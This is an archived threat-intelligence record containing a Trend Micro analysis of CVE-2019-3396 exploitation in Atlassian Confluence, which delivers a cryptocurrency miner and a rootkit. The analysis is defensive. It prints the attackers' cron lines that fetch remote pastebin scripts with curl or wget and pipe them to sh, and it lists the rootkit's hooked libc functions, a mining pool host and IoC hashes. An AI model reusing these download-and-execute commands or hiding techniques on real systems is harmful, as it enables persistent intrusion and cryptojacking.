{
	"id": "2e8b4542-57a2-43da-b98e-f815473830f4",
	"created_at": "2026-04-06T00:12:53.131256Z",
	"updated_at": "2026-04-10T13:12:17.238271Z",
	"deleted_at": null,
	"sha1_hash": "3e18f65597ac9fb99c1fd9e56a9728f97f94111a",
	"title": "CVE-2019-3396: Exploiting the Confluence Vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 88588,
	"plain_text": "CVE-2019-3396: Exploiting the Confluence Vulnerability\r\nBy By: Augusto Remillano II, Robert Malagad May 07, 2019 Read time: 3 min (854 words)\r\nPublished: 2019-05-07 · Archived: 2026-04-05 19:01:56 UTC\r\nIn March 2019, Atlassian published an advisory covering two critical vulnerabilities involving Confluence, a widely used\r\ncollaboration and planning software. In April, we observed one of these vulnerabilities, the widget connector vulnerability\r\nCVE-2019-3396, being exploited by threat actors to perform malicious attacks. Security provider Alert Logic also\r\ndiscovered the vulnerability being exploited to drop the Gandcrab ransomwareopen on a new tab.\r\nIt seems that these incidents are not the last we’ve seen of the CVE-2019-3396 exploitation, as threat actors are still finding\r\nnew ways to exploit the vulnerability. We discovered that it is also being used to deliver a cryptocurrency-mining malware\r\ncontaining a rootkit that was designed to hide its activities. This technique is highly reminiscent of another attacknews-cybercrime-and-digital-threats that occurred in November 2018 that used a similar miner-rootkit combination.\r\nArrival and propagation\r\nintel\r\nFigure 1. Infection chain\r\nThe attack begins with a remote command sent to download a shell script from pastebin\r\n(hxxps://pastebin[.]com/MjGrx7EA).\r\nThis shell script kills certain processes and then downloads and executes “lsd_1” from another pastebin\r\n(hxxps://pastebin[.]com/CvJM3qz5). This file is a second shell script that will drop a third shell script, “lsd_2,” sourced from\r\nyet another pastebin (hxxps://pastebin[.]com/a3EAddwq).\r\nThis shell script is responsible for downloading a trojan dropper from the following servers:\r\ngwjyhs[.]com\r\nimg[.]sobot[.]com\r\nThe malware, kerberods (detected as Trojan.Linux.KERBERDS.A), is a custom-packed binary that installs itself via cron\r\njobs:\r\n*/10* * * * curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh\r\n*/15* * * * wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh\r\n*/10* * * * root curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh\r\n*/15* * * * root wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh\r\n*/15* * * * (curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wget -q -O-hxxps://pastebin[.]com/raw/rPB8eDpu)|sh\r\nKerberods is responsible for dropping the cryptocurrency miner (khugepageds, detected as\r\nCoinminer.Linux.MALXMR.UWEJI) and its rootkit component.  \r\nOne particularly interesting aspect of the binary is the way it drops the rootkit. First, it writes the code for the rootkit to a file\r\nnamed /usr/local/lib/{random filename}.c.\r\nintel\r\nFigure 2. Writing the rootkit code\r\nThe rootkit is then compiled via gcc, with the output binary being /usr/local/lib/{random filename}.so.\r\nintelFigure 3. Compiling the rootkit code\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/\r\nPage 1 of 4\n\nKerberods also has multiple ways of propagating itself, spreading via SSH and exploiting CVE-2019-1003001 and CVE-2019-1003000.\r\nAs for khugepageds, it is an XMRig 2.14.1-mo1 Monero miner with a config that is hardcoded into the binary:\r\nintel\r\nFigure 4. The miner’s config\r\nThe mining pool can be accessed at systemten[.]org:51640.\r\nRootkit as evasion method\r\nAs mentioned earlier, this attack shares many of the same characteristics of last year’s incident, such as the use of pastebin\r\nas a C\u0026C server, the miner payload, and its use of a rootkit to hide the malware.\r\nLike kerberods, the miner payload also uses a custom packer to impede analysis.\r\nintel\r\nFigure 5. The custom packer used for the cryptocurrency-mining malware\r\nUnlike the older rootkit that only hooks the readdir function to hide the mining process, this new version hooks more\r\nfunctions. It hides not only the mining process but also certain files and network traffic. It is also capable of forging the\r\nmachine’s CPU usage.\r\nThe hooked functions are shown below:\r\nfopen\r\nfopen64\r\nlstat\r\nlxstat\r\nopen\r\nrmdir\r\nstat\r\nstat64\r\n__xstat\r\n__xstat64\r\nunlink\r\nunlinkat\r\nopendir\r\nreaddir\r\nreaddir6\r\nMost of the hooked functions would return a “No such file or directory error” if their parameter contains the file name of the\r\nrootkit, the miner, or ld.so.preload.\r\nintel\r\nFigure 6. Hooked functions returning an error to hide the infection\r\nThe following image shows the htop system monitor output with and without the rootkit loaded. Note how the version with\r\nthe rootkit loaded hides the CPU usage and the mining process.\r\nintel\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/\r\nPage 2 of 4\n\nFigure 7. Comparison of the htop system monitor output showing the version with (right) and without (left) the rootkit\r\npresent\r\nintel\r\nFigure 8. Netstat output before (left) and after (right) the rootkit is loaded\r\nintel\r\nFigure 9. Functions for forging CPU usage and TCP connections\r\nintel\r\nFigure 10. Forging network traffic\r\nintel\r\nFigure 11. Forging CPU usage\r\nThe rootkit also serves as a form of persistence by hooking the access function so that a cron job is created to reinstall the\r\nmalware whenever it is called.\r\nintel\r\nFigure 12. Code showing the cron job used to download and execute kerberods\r\nSecurity recommendations and solutions\r\nWe’ve seen multiple attacks involving CVE-2019-3396 within a short span of time. This shows that cybercriminals are\r\nwilling and able to abuse any vulnerability in multiple ways. This emphasizes that continuous monitoringnews article is\r\nneeded to detect any threats in an organization’s environment.\r\nFor effective monitoring, organizations can look into the Trend Micro™ Hybrid Cloud Securityproducts solution, which\r\nprovides powerful, streamlined, and automated securityproducts within the DevOps pipelineproducts. It also provides\r\nmultiple XGen™products threat defense techniques for protecting physical, virtual, and cloud workloads.  In addition, it\r\nprotects containers via the Deep Securityproducts™ and Deep Security Smart Checkproducts solutions, which help DevOps\r\nand security teams scan and ensure the security of container images during preruntime and runtime.\r\nThe Trend Micro Deep Securityopen on a new tab solution protects user systems from threats that may target the following\r\nvulnerability rule:\r\n1009705 - Atlassian Confluence Server Remote Code Execution Vulnerability (CVE-2019-3396)  \r\nIndicators of Compromise (IoCs)\r\nDetails Hashes (SHA-256) Detection  Name\r\nkerberods\r\n(coinminer\r\nbinary)\r\na9228b6a3fe0b8375d6b881626fd4b59fbbf54dbd60a94b085ee0455b3d18fe9 Trojan.Linux.KERBERDS.A\r\nkhugepageds\r\n(cryptocurrency\r\nmining\r\nmalware)\r\n25064a5ab78cdd36e7049d00b9319222906dd634908c1858e2262bf333631213 Coinminer.Linux.MALXMR.UW\r\nrandom.so\r\n(rootkit)\r\n3392589c9ebbf7600035574e338d69625cd5ce83ee655582fe8bbadb663532b3 Rootkit.Linux.KERBERDS.A\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/\r\nPage 3 of 4\n\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-min\r\ner-with-rootkit/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/"
	],
	"report_names": [
		"cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434373,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e18f65597ac9fb99c1fd9e56a9728f97f94111a.pdf",
		"text": "https://archive.orkl.eu/3e18f65597ac9fb99c1fd9e56a9728f97f94111a.txt",
		"img": "https://archive.orkl.eu/3e18f65597ac9fb99c1fd9e56a9728f97f94111a.jpg"
	}
}